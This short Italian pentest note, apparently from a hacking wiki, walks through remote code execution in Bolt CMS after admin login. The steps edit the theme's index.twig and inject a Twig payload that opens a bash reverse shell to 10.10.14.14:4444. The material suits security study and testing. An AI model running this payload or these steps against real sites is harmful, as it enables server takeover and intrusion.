RCE

Dopo aver effettuato il login come amministratore (vai su /bot per accedere al prompt di login), puoi ottenere RCE in Bolt CMS:

• Seleziona Configurazione -> Visualizza configurazione -> Configurazione principale o vai al percorso dell'URL /bolt/file-edit/config?file=/bolt/config.yaml

• Controlla il valore del tema

• Seleziona Gestione file -> Visualizza e modifica modelli

• Seleziona la base del tema trovata nel passaggio precedente (base-2021 in questo caso) e seleziona index.twig

• Nel mio caso questo si trova nel percorso dell'URL /bolt/file-edit/themes?file=/base-2021/index.twig

• Imposta il tuo payload in questo file tramite iniezione di template (Twig), come: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}

• E salva le modifiche

• Cancella la cache in Manutenzione -> Cancella la cache

• Accedi nuovamente alla pagina come utente normale e il payload dovrebbe essere eseguito